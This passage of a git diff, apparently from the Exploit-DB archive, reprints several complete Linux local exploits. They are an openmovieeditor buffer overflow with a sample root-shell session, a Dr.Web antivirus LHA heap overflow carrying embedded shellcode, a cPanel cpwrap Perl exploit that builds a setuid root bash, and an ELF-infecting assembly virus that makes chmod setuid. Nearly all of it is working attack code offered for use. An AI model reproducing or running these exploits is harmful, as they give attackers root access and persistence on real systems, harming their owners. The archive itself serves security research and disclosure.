memory. + * [+] Putting shellcode in the environment. + * [+] Going into the environment (ENVT) and exiting .... 
+ * Done 37 bytes loaded to (ENVT) + * devil: ~ \> envt/envt + * SHELLCODE FOUND IN 0xbffffbf5 + * devil: ~ \> ./ome_buf + * + * ***************************************** + * openmovieeditor buffer overflow exploit + * by qnix < qnix[at]bsdmail[dot]org + * Dont forget to change the return address + * ***************************************** + * + * Usage : ./ome_buf + * devil: ~ \> ./ome_buf Video\ Projects/exploit.vproj /usr/local/bin/openmovieeditor + * + * [+] Video Projects/exploit.vproj Created|Opened + * [~] Desired Return Addr : 0xbffffbf5 + * [~] Offset from ESP : 0x0 + * [+] Executing openmovieeditor + * + * sh-3.1# whoami;id + * root + * uid=0(root) gid=0(root) groups=0(root) + * sh-3.1# exit + * exit + * + * -------------------------- + * + * */ + +#include +#include + +#define RETADDR '\xbf\xff\xfb\xf5' +#define SLEEP sleep(1); + +int main(int argc,char *argv[]) { + FILE *output; + + int i, offset; + long ret, *addr_ptr; + char *buffer, *ptr; + + offset = 0; + ret = RETADDR - offset; + + if(argc != 3) { + fprintf(stderr,"\n*****************************************\n"); + fprintf(stderr,"openmovieeditor buffer overflow exploit\n"); + fprintf(stderr,"by qnix < qnix[at]bsdmail[dot]org\n"); + fprintf(stderr,"Dont forget to change the return address\n"); + fprintf(stderr,"*****************************************\n\n"); + + fprintf(stderr,"Usage : %s \n",argv[0]); + return 0; + } + + output = fopen(argv[1],"w+"); + + if(output == 0) { + fprintf(stderr,"\n[-] Cannot create %s\n",argv[1]); + SLEEP + return 0; + } else { + fprintf(stdout,"\n[+] %s Created|Opened\n",argv[1]); + SLEEP + } + + fprintf(output,"\n"); + fprintf(output,"\n"); + fprintf(output," 0.0.20060901\n"); + + /* evil code ^_^ */ + buffer = malloc(2300); + ptr = buffer; + addr_ptr = (long *) ptr; + for(i=0; i < 2300; i+=4) + { *(addr_ptr++) = ret; } + for(i=0; i < 1040; i++) + { buffer[i] = '\x90'; } + ptr = buffer + 1044; + buffer[2300-1] = 0; + + fprintf(output," %s\n",buffer); + 
fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output,"\n"); + + fprintf(stdout,"[~] Desired Return Addr : 0x%x\n", ret); + SLEEP + fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset); + SLEEP + + fprintf(stdout,"[+] Executing openmovieeditor\n\n"); + fclose(output); + SLEEP + + execl(argv[2],"openmovieeditor",0); + + return 0; +} + +// milw0rm.com [2006-09-09] diff --git a/platforms/linux/local/2404.c b/platforms/linux/local/2404.c index 449449145..d3aba08ae 100755 --- a/platforms/linux/local/2404.c +++ b/platforms/linux/local/2404.c 
@@ -1,208 +1,208 @@ -/******************************************************************** - -stetoscope.c: -Dr.Web 4.33 antivirus LHA directory name heap overflow for linux - - -- Howto: - - Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . - I guess that you can use the address of free(), but my exploit - uses the address of realpath(). There was a NULL byte in the GOT - entry of free() so I had to find something else ;-) - - Calling the exploit will produce a file. Scan this file with a - vulnerable version of drweb and you will, hopefully, get a shell :-) - - Good luck! - - -- Exploit particularities: - - - There is a NOP sled using \xeb\x0a . Increases exploit - reliability - - 0xff and 0x00 are filtered caracters - - Bypass some malloc security checks added in malloc.c: - - Little security check which won't hurt performance: the - allocator never wrapps around at the end of the address space. - Therefore we can exclude some size values which might appear - here by accident or by "design" from some intruder. - - This thread helped me a lot :-) : - - http://archives.neohapsis.com/archives/dailydave/2006- - q1/thread.html#149 - - - Shellcode took from Metasploit's shellcode generator. 
- - -- Coded by: - - Jean-Sebastien Guay-Leroux - http://www.guay-leroux.com - -*********************************************************************/ - -#include -#include -#include -#include - -// Base structure of a LHA file -#define I_HEADER_SIZE 0 -#define I_HEADER_CHECKSUM 1 -#define I_METHOD 2 -#define I_PACKED_SIZE 7 -#define I_ORIGINAL_SIZE 11 -#define I_LAST_MODIFIED_STAMP 15 -#define I_ATTRIBUTE 19 -#define I_HEADER_LEVEL 20 -#define I_NAME_LENGTH 21 -#define I_NAME 22 -#define I_CRC 26 -#define I_EXTEND_TYPE 28 - -// Extended structure of a LHA file -#define E_HEADER_SIZE 0 -#define E_HEADER_TYPE 2 -#define E_HEADER_NAME 3 - -#define DEBUG 0 - -unsigned char shellcode1[] = -"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" -"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2" -"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d" -"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56" -"\xe9\xdc\xa2\xdf"; - -FILE * open_file (char *filename) { - - FILE *fp; - - fp = fopen ( filename , "w" ); - - if (!fp) { - perror ("Cant open file"); - exit (-1); - } - - return fp; -} - -void put_byte (char *ptr, unsigned char data) { - *ptr = data; -} - -void put_word (char *ptr, unsigned short data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); -} - -void put_longword (char *ptr, unsigned long data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); - put_byte (ptr + 2, data >> 16); - put_byte (ptr + 3, data >> 24); -} - -void usage (char *progname) { - - printf ("\nTo use:\n"); - printf ("%s \n\n", progname); - printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", - progname); - - exit (-1); -} - -int main (int argc, char *argv[]) { - - FILE *fp; - char *hdr = (char *) malloc (4096), *ptr; - int header_size; - int written_bytes; - int total_size; - unsigned int retloc, retaddr; - char *filename = (char *) malloc (256); - int i; - - if (!hdr) { - perror ("Error allocating memory"); - exit 
(-1); - } - - if ( argc != 4) { - usage ( argv[0] ); - } - - // parse arguments - sscanf (argv[1], "0x%x", &retloc); - sscanf (argv[2], "0x%x", &retaddr); - strncpy (filename, argv[3], 255); - - memset (hdr, 0, 4096); - - // base header - header_size = 29; - put_byte (hdr + I_HEADER_SIZE, header_size); - put_byte (hdr + I_HEADER_CHECKSUM, 83); - memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression... - put_longword (hdr + I_PACKED_SIZE, 0x1234); - put_longword (hdr + I_ORIGINAL_SIZE, 0x1234); - put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234); - put_byte (hdr + I_ATTRIBUTE, 0x20); - put_byte (hdr + I_HEADER_LEVEL, 0x01); - put_byte (hdr + I_NAME_LENGTH, 0x04); - put_longword (hdr + I_NAME, 0x90909090); - put_word (hdr + I_CRC, 0x6666); - put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem. - - // extended header - put_word (hdr + header_size + E_HEADER_SIZE, 285); - put_byte (hdr + header_size + E_HEADER_TYPE, 0x2); - - // Build our payload - memset (hdr + header_size + E_HEADER_NAME, 0x41, 266); - for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 - - strlen (shellcode1) - 10);) { - ptr[i++] = 0xeb; - ptr[i++] = 0x0a; - } - for (; i < (240 - strlen (shellcode1));) { - ptr[i++]=0x90; - } - memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen - (shellcode1), shellcode1, strlen(shellcode1)); - - put_longword (hdr + header_size + E_HEADER_NAME + 266, - 0x41414141); - put_longword (hdr + header_size + E_HEADER_NAME + 270, - 0xB7E34CC2); - put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc - - 0xc); - put_longword (hdr + header_size + E_HEADER_NAME + 278, - retaddr); - - // Size of next extended header is 0 - put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000); - - total_size = (header_size + 284 + E_HEADER_NAME); - - fp = open_file (filename); - - if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) - { - if (DEBUG) printf ("%d bytes written\n", - written_bytes); - } else { - perror ("Cant write to the file\n"); - } - 
- fclose (fp); - - return 0; -} - -// milw0rm.com [2006-09-20] +/******************************************************************** + +stetoscope.c: +Dr.Web 4.33 antivirus LHA directory name heap overflow for linux + + +- Howto: + + Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . + I guess that you can use the address of free(), but my exploit + uses the address of realpath(). There was a NULL byte in the GOT + entry of free() so I had to find something else ;-) + + Calling the exploit will produce a file. Scan this file with a + vulnerable version of drweb and you will, hopefully, get a shell :-) + + Good luck! + + +- Exploit particularities: + + - There is a NOP sled using \xeb\x0a . Increases exploit + reliability + - 0xff and 0x00 are filtered caracters + - Bypass some malloc security checks added in malloc.c: + + Little security check which won't hurt performance: the + allocator never wrapps around at the end of the address space. + Therefore we can exclude some size values which might appear + here by accident or by "design" from some intruder. + + This thread helped me a lot :-) : + + http://archives.neohapsis.com/archives/dailydave/2006- + q1/thread.html#149 + + - Shellcode took from Metasploit's shellcode generator. 
+ + +- Coded by: + + Jean-Sebastien Guay-Leroux + http://www.guay-leroux.com + +*********************************************************************/ + +#include +#include +#include +#include + +// Base structure of a LHA file +#define I_HEADER_SIZE 0 +#define I_HEADER_CHECKSUM 1 +#define I_METHOD 2 +#define I_PACKED_SIZE 7 +#define I_ORIGINAL_SIZE 11 +#define I_LAST_MODIFIED_STAMP 15 +#define I_ATTRIBUTE 19 +#define I_HEADER_LEVEL 20 +#define I_NAME_LENGTH 21 +#define I_NAME 22 +#define I_CRC 26 +#define I_EXTEND_TYPE 28 + +// Extended structure of a LHA file +#define E_HEADER_SIZE 0 +#define E_HEADER_TYPE 2 +#define E_HEADER_NAME 3 + +#define DEBUG 0 + +unsigned char shellcode1[] = +"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" +"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2" +"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d" +"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56" +"\xe9\xdc\xa2\xdf"; + +FILE * open_file (char *filename) { + + FILE *fp; + + fp = fopen ( filename , "w" ); + + if (!fp) { + perror ("Cant open file"); + exit (-1); + } + + return fp; +} + +void put_byte (char *ptr, unsigned char data) { + *ptr = data; +} + +void put_word (char *ptr, unsigned short data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); +} + +void put_longword (char *ptr, unsigned long data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); + put_byte (ptr + 2, data >> 16); + put_byte (ptr + 3, data >> 24); +} + +void usage (char *progname) { + + printf ("\nTo use:\n"); + printf ("%s \n\n", progname); + printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", + progname); + + exit (-1); +} + +int main (int argc, char *argv[]) { + + FILE *fp; + char *hdr = (char *) malloc (4096), *ptr; + int header_size; + int written_bytes; + int total_size; + unsigned int retloc, retaddr; + char *filename = (char *) malloc (256); + int i; + + if (!hdr) { + perror ("Error allocating memory"); + exit 
(-1); + } + + if ( argc != 4) { + usage ( argv[0] ); + } + + // parse arguments + sscanf (argv[1], "0x%x", &retloc); + sscanf (argv[2], "0x%x", &retaddr); + strncpy (filename, argv[3], 255); + + memset (hdr, 0, 4096); + + // base header + header_size = 29; + put_byte (hdr + I_HEADER_SIZE, header_size); + put_byte (hdr + I_HEADER_CHECKSUM, 83); + memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression... + put_longword (hdr + I_PACKED_SIZE, 0x1234); + put_longword (hdr + I_ORIGINAL_SIZE, 0x1234); + put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234); + put_byte (hdr + I_ATTRIBUTE, 0x20); + put_byte (hdr + I_HEADER_LEVEL, 0x01); + put_byte (hdr + I_NAME_LENGTH, 0x04); + put_longword (hdr + I_NAME, 0x90909090); + put_word (hdr + I_CRC, 0x6666); + put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem. + + // extended header + put_word (hdr + header_size + E_HEADER_SIZE, 285); + put_byte (hdr + header_size + E_HEADER_TYPE, 0x2); + + // Build our payload + memset (hdr + header_size + E_HEADER_NAME, 0x41, 266); + for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 + - strlen (shellcode1) - 10);) { + ptr[i++] = 0xeb; + ptr[i++] = 0x0a; + } + for (; i < (240 - strlen (shellcode1));) { + ptr[i++]=0x90; + } + memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen + (shellcode1), shellcode1, strlen(shellcode1)); + + put_longword (hdr + header_size + E_HEADER_NAME + 266, + 0x41414141); + put_longword (hdr + header_size + E_HEADER_NAME + 270, + 0xB7E34CC2); + put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc + - 0xc); + put_longword (hdr + header_size + E_HEADER_NAME + 278, + retaddr); + + // Size of next extended header is 0 + put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000); + + total_size = (header_size + 284 + E_HEADER_NAME); + + fp = open_file (filename); + + if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) + { + if (DEBUG) printf ("%d bytes written\n", + written_bytes); + } else { + perror ("Cant write to the file\n"); + } + 
+ fclose (fp); + + return 0; +} + +// milw0rm.com [2006-09-20] diff --git a/platforms/linux/local/2466.pl b/platforms/linux/local/2466.pl index 6853832a9..981ed9ecf 100755 --- a/platforms/linux/local/2466.pl +++ b/platforms/linux/local/2466.pl 
@@ -1,41 +1,41 @@ -#!/usr/bin/perl -w - -# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin -# use strict; # haha oh wait.. - -my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; -my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; -my $pwd = `pwd`; - -chomp $pwd; -$ENV{'PERL5LIB'} = "$pwd"; - -if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } -if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } -if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } - -open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; -while() { - if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } -} -close (CPWRAP); - -open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; -print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; -print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; -print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; -print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; -print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; -close (STRICT); - -system("$mysqlwrap DUMPMYSQL 2>/dev/null"); - -if ( -e "Maildir" ) { - system("./Maildir"); -} -else { - unlink "strict.pm"; - die "Failed\n"; -} - -# milw0rm.com [2006-10-01] +#!/usr/bin/perl -w + +# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin +# use strict; # haha oh wait.. + +my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; +my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; +my $pwd = `pwd`; + +chomp $pwd; +$ENV{'PERL5LIB'} = "$pwd"; + +if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } +if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } +if ( ! 
-x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } + +open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; +while() { + if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } +} +close (CPWRAP); + +open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; +print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; +print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; +print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; +print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; +print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; +close (STRICT); + +system("$mysqlwrap DUMPMYSQL 2>/dev/null"); + +if ( -e "Maildir" ) { + system("./Maildir"); +} +else { + unlink "strict.pm"; + die "Failed\n"; +} + +# milw0rm.com [2006-10-01] diff --git a/platforms/linux/local/249.c b/platforms/linux/local/249.c index ad668a3e6..60c0b2ab0 100755 --- a/platforms/linux/local/249.c +++ b/platforms/linux/local/249.c @@ -560,6 +560,6 @@ void search_valid_language() printf("failed to find a valid language\naborting\n"); exit(0); } - - -// milw0rm.com [2003-01-15] + + +// milw0rm.com [2003-01-15] diff --git a/platforms/linux/local/2492.s b/platforms/linux/local/2492.s index e9dce81b4..568f1e55f 100755 --- a/platforms/linux/local/2492.s +++ b/platforms/linux/local/2492.s 
@@ -1,329 +1,329 @@ -# gcc infR3.s -o infR3 -# strip infR3 -# find a writable binary (example: ls) -# ./infR3 /bin/ls -# when root calls the writable ls, chmod will be setuided -# Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com - -.text -.global main - # infeccion de _start para conseguir local root - # use at your own risk - # - # Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com - # - # GPLv2 -main: - push %ebp - movl %esp, %ebp - subl $500, %esp #si el codigo del bicho es mas grande, habra k ampliar este buffer - -get_param: - movl 0x0c(%ebp), %eax - movl 4(%eax), %ebx # ebx -> argv[1] - -open_host: - movl $5, %eax - movl $2, %ecx - int $0x80 - movl %eax, -4(%ebp) # descriptor en -4 - -calc_len: - movl $19, %eax - movl -4(%ebp), %ebx - xorl %ecx, %ecx - movl $2, %edx - int $0x80 - movl %eax, -8(%ebp) # longitud del host en -8 - -mapeo: - movl $90, %eax - xorl %ecx, %ecx - pushl %ecx # offset 0 - pushl -4(%ebp) # descriptor - pushl $1 # privado 0x22 - pushl $3 # read|write 0x07 - pushl -8(%ebp) # size - pushl %ecx # nulo, para que nos indique mmap donde. - movl %esp, %ebx - int $0x80 - cmp $0xfffff000, %eax - jbe ident - - # error en el mapa - jmp ending - -ident: - movl %eax, -12(%ebp) # -12 -> VA del mapa - # eax -> VA del mapa - - cmpl $0x464c457f, (%eax) # es elf? - jne not_elf - cmpb $0x02, 0x10(%eax) # es ejecutable? 
- jne not_elf - cmpl $0xde, 0x07(%eax) # comprobar si ya ha sido infectado - je not_elf - - movl $0xde, 0x07(%eax) # Marca de infeccion - -guarda_init: - movl $end_vir, %ecx - #addl $5, %ecx - subl $start_vir, %ecx - movl %ecx,-16(%ebp) # -16 -> size del virus + 5 - # ecx -> size del virus + 5 - - leal -500(%ebp), %edi # edi -> -500 - movl 0x18(%eax), %esi # esi -> RVA e_entry - movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (cuenta atras) - -primer_ph: - movl 0x1c(%eax), %edx # edx -> RVA e_phoff - addl %eax, %edx # edx -> VA e_phoff - -busca_ph: - cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => siguiente PH - jna destino - -siguiente_ph: - addl 0x2a(%edx), %edx - loop busca_ph - - -destino: ######### LA CLAVE DE TODO ########## - subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr - addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset - #addl $0x34, %esi # alineacion #subl $0x30 -> _init - #addl $0x34 -> _start (p_offset) - #subl $0x65, %esi - addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset - movl %esi, %edx - -salvo_start: - movl -16(%ebp), %ecx # virus size - rep movsb # copiando _start en -400 - -guarda_virus: - movl %edx, %edi # edi -> VA del entry point - movl $start_vir, %esi # esi -> VA del inicio del virus - movl -16(%ebp), %ecx # ecx -> size del virus - rep movsb - - jmp sincroniza - -not_elf: - movl $4, %eax - movl $1, %ebx - movl $notelf, %ecx - movl $28, %edx - int $0x80 - -sincroniza: - movl %eax, %ebx # ebx -> mapa - movl $144, %eax # eax -> msync - movl -8(%ebp),%ecx # ecx -> size del mapa - movl $2, %edx # edx -> flags - int $0x80 - -desmapea: - movl $91, %eax - movl -12(%ebp), %ebx # VA inicial del mapa - movl -8(%ebp), %ecx # size del mapa - int $0x80 - -seek_end: - movl $19, %eax # lseek - movl -4(%ebp), %ebx - xorl %ecx, %ecx - movl $2, %edx # SEEK_END - int $0x80 -write: - movl $4, %eax - movl -4(%ebp), %ebx - leal -500(%ebp), %ecx - movl -16(%ebp), %edx - int $0x80 - -cierra_host: - movl $6, %eax - movl -4(%ebp), %ebx - int 
$0x80 - -utime: - #movl $30, %eax - #int $0x80 - - -ending: - movl $6, %eax - int $0x80 - - leave - ret - -###################################################################### -start_vir: - pushal # backup de 0x20 bytes - subl $400, %esp # espacio de pila de 400 bytes (total 0x1b0 bytes 0x1b0 + 4 = 0x1b4(%esp)) - - call delta # ebp -> delta offset -delta: - popl %ebp - subl $delta, %ebp - -payload_code: ##### PAYLOAD ##### - -soy_root: - movl $0x18, %eax - int $0x80 #__NR_getuid - test %eax, %eax - -no_pues_fuera: - jnz end_payload_code - -setuidar: - movl $0x0f, %eax - leal shushi(%ebp), %ebx - movl $04755, %ecx - int $0x80 # __NR_chmod - - -end_payload_code: ###################### - -calcula_nombre_host: - movl $1,%edx # edx -> length del nombre de host - movl 0x1b4(%esp), %edi # edi -> addr del inicio del nombre del huesped - xorl %ebx, %ebx - movl $9900, %ecx - -busca_path: - cmpl %ebx, (%edi) - je path_encontrado - - incl %edi - loop busca_path - - -path_encontrado: - movl $100, %ecx - decl %edi - -situa_inicio_nombre: - cmpb %bl, (%edi) - je nombre_ok - - decl %edi - loop situa_inicio_nombre - - -nombre_ok: - incl %edi - -desproteger_host: - movl $125, %eax # mprotect - leal start_vir(%ebp), %ebx - andl $0xfffff000, %ebx # pagina del bicho - movl $2000, %ecx # 2 paginas a desproteger - movl $7, %edx # rwx - int $0x80 # ahora ya tengo w ya puedo poner encima - # el codigo correcto de _start -desproteger_pila: - movl $125, %eax # mprotect - movl %esp, %ebx - andl $0xfffff000, %ebx # pagina de pila - int $0x80 # - - -reconstruye_host: - movl $5, %eax # open - movl %edi, %ebx # argv[0] - xorl %ecx, %ecx # solo me puedo abrir a mi mismo en modo 0 - int $0x80 # (O_RDONLY) - - movl $end_vir, %esi # final-inicio+variable del final - subl $start_vir, %esi # esi -> virus length - - xorl %ecx, %ecx - movl %eax, %ebx # descriptor host - movl $19, %eax # lseek - movl $2, %edx # SEEK_END - int $0x80 # nos situamos al final del host-virsize - movl %eax, %edi # edi -> 
tamanyo del host - - pushl %ecx # offset: todo el file desde el inicio - pushl %ebx # descriptor - pushl $1 # mapa privado - pushl $1 # solo lectura (el descriptor esta modo 0) - pushl %eax # mapeamos todo el file - pushl %ecx # que me de el la address - movl $90, %eax - movl %esp, %ebx - int $0x80 - cmp $0xfffff000, %eax - jbe reconstruye - - int $3 # mapa incorrecto - -reconstruye: - addl %edi, %eax # eax -> final del mapa - subl %esi, %eax # eax -> inicio del saved _start - - movl %esi, virisize(%ebp) - movl %eax, savedstart(%ebp) - - movl $fin_paranoia, %ecx # como que no me puedo borrar a mi - subl $paranoia, %ecx # mismo, porque perderia la ejecucion - leal paranoia(%ebp), %esi # copio el codigo de borrado a otro - movl %esp, %edi # area de memoria y desvio la ejecucion - rep movsb # ahi. - jmp *%esp - -paranoia: - movl virisize(%ebp), %ecx - movl savedstart(%ebp), %esi # optimizable - leal start_vir(%ebp), %edi - rep movsb - -proteger_host: - movl $125, %eax # mprotect - leal start_vir(%ebp), %ebx - andl $0xfffff000, %ebx # pagina del bicho - movl $2000, %ecx # 2 paginas a desproteger - movl $5, %edx # r-x - int $0x80 # ahora ya tengo w ya puedo poner encima - # el codigo correcto de _start -proteger_pila: - movl $125, %eax # mprotect - movl %esp, %ebx - andl $0xfffff000, %ebx # pagina de pila - movl $6, %edx # rw- - int $0x80 # - - movl $6, %eax # close - int $0x80 # ebx descriptor - - - leal start_vir(%ebp), %eax - addl $424, %esp # ok - movl %eax, 8(%esp) # ok (en el saved ebp) - popal - jmp *%ebp - - -fin_paranoia: - -virisize: - .long 0x00000000 -savedstart: - .long 0x00000000 -shushi: - .string "/bin/chmod\0" - -end_vir: -####################################################################### - -notelf: - .string "NOT ELF OR INFECTED YET!!!\n\0" -fin: - -# milw0rm.com [2006-10-08] +# gcc infR3.s -o infR3 +# strip infR3 +# find a writable binary (example: ls) +# ./infR3 /bin/ls +# when root calls the writable ls, chmod will be setuided +# Coded by 
jolmos@7a69ezine.org == sha0@BadCheckSum.com + +.text +.global main + # infeccion de _start para conseguir local root + # use at your own risk + # + # Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com + # + # GPLv2 +main: + push %ebp + movl %esp, %ebp + subl $500, %esp #si el codigo del bicho es mas grande, habra k ampliar este buffer + +get_param: + movl 0x0c(%ebp), %eax + movl 4(%eax), %ebx # ebx -> argv[1] + +open_host: + movl $5, %eax + movl $2, %ecx + int $0x80 + movl %eax, -4(%ebp) # descriptor en -4 + +calc_len: + movl $19, %eax + movl -4(%ebp), %ebx + xorl %ecx, %ecx + movl $2, %edx + int $0x80 + movl %eax, -8(%ebp) # longitud del host en -8 + +mapeo: + movl $90, %eax + xorl %ecx, %ecx + pushl %ecx # offset 0 + pushl -4(%ebp) # descriptor + pushl $1 # privado 0x22 + pushl $3 # read|write 0x07 + pushl -8(%ebp) # size + pushl %ecx # nulo, para que nos indique mmap donde. + movl %esp, %ebx + int $0x80 + cmp $0xfffff000, %eax + jbe ident + + # error en el mapa + jmp ending + +ident: + movl %eax, -12(%ebp) # -12 -> VA del mapa + # eax -> VA del mapa + + cmpl $0x464c457f, (%eax) # es elf? + jne not_elf + cmpb $0x02, 0x10(%eax) # es ejecutable? 
+ jne not_elf + cmpl $0xde, 0x07(%eax) # comprobar si ya ha sido infectado + je not_elf + + movl $0xde, 0x07(%eax) # Marca de infeccion + +guarda_init: + movl $end_vir, %ecx + #addl $5, %ecx + subl $start_vir, %ecx + movl %ecx,-16(%ebp) # -16 -> size del virus + 5 + # ecx -> size del virus + 5 + + leal -500(%ebp), %edi # edi -> -500 + movl 0x18(%eax), %esi # esi -> RVA e_entry + movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (cuenta atras) + +primer_ph: + movl 0x1c(%eax), %edx # edx -> RVA e_phoff + addl %eax, %edx # edx -> VA e_phoff + +busca_ph: + cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => siguiente PH + jna destino + +siguiente_ph: + addl 0x2a(%edx), %edx + loop busca_ph + + +destino: ######### LA CLAVE DE TODO ########## + subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr + addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset + #addl $0x34, %esi # alineacion #subl $0x30 -> _init + #addl $0x34 -> _start (p_offset) + #subl $0x65, %esi + addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset + movl %esi, %edx + +salvo_start: + movl -16(%ebp), %ecx # virus size + rep movsb # copiando _start en -400 + +guarda_virus: + movl %edx, %edi # edi -> VA del entry point + movl $start_vir, %esi # esi -> VA del inicio del virus + movl -16(%ebp), %ecx # ecx -> size del virus + rep movsb + + jmp sincroniza + +not_elf: + movl $4, %eax + movl $1, %ebx + movl $notelf, %ecx + movl $28, %edx + int $0x80 + +sincroniza: + movl %eax, %ebx # ebx -> mapa + movl $144, %eax # eax -> msync + movl -8(%ebp),%ecx # ecx -> size del mapa + movl $2, %edx # edx -> flags + int $0x80 + +desmapea: + movl $91, %eax + movl -12(%ebp), %ebx # VA inicial del mapa + movl -8(%ebp), %ecx # size del mapa + int $0x80 + +seek_end: + movl $19, %eax # lseek + movl -4(%ebp), %ebx + xorl %ecx, %ecx + movl $2, %edx # SEEK_END + int $0x80 +write: + movl $4, %eax + movl -4(%ebp), %ebx + leal -500(%ebp), %ecx + movl -16(%ebp), %edx + int $0x80 + +cierra_host: + movl $6, %eax + movl -4(%ebp), %ebx + int 
$0x80 + +utime: + #movl $30, %eax + #int $0x80 + + +ending: + movl $6, %eax + int $0x80 + + leave + ret + +###################################################################### +start_vir: + pushal # backup de 0x20 bytes + subl $400, %esp # espacio de pila de 400 bytes (total 0x1b0 bytes 0x1b0 + 4 = 0x1b4(%esp)) + + call delta # ebp -> delta offset +delta: + popl %ebp + subl $delta, %ebp + +payload_code: ##### PAYLOAD ##### + +soy_root: + movl $0x18, %eax + int $0x80 #__NR_getuid + test %eax, %eax + +no_pues_fuera: + jnz end_payload_code + +setuidar: + movl $0x0f, %eax + leal shushi(%ebp), %ebx + movl $04755, %ecx + int $0x80 # __NR_chmod + + +end_payload_code: ###################### + +calcula_nombre_host: + movl $1,%edx # edx -> length del nombre de host + movl 0x1b4(%esp), %edi # edi -> addr del inicio del nombre del huesped + xorl %ebx, %ebx + movl $9900, %ecx + +busca_path: + cmpl %ebx, (%edi) + je path_encontrado + + incl %edi + loop busca_path + + +path_encontrado: + movl $100, %ecx + decl %edi + +situa_inicio_nombre: + cmpb %bl, (%edi) + je nombre_ok + + decl %edi + loop situa_inicio_nombre + + +nombre_ok: + incl %edi + +desproteger_host: + movl $125, %eax # mprotect + leal start_vir(%ebp), %ebx + andl $0xfffff000, %ebx # pagina del bicho + movl $2000, %ecx # 2 paginas a desproteger + movl $7, %edx # rwx + int $0x80 # ahora ya tengo w ya puedo poner encima + # el codigo correcto de _start +desproteger_pila: + movl $125, 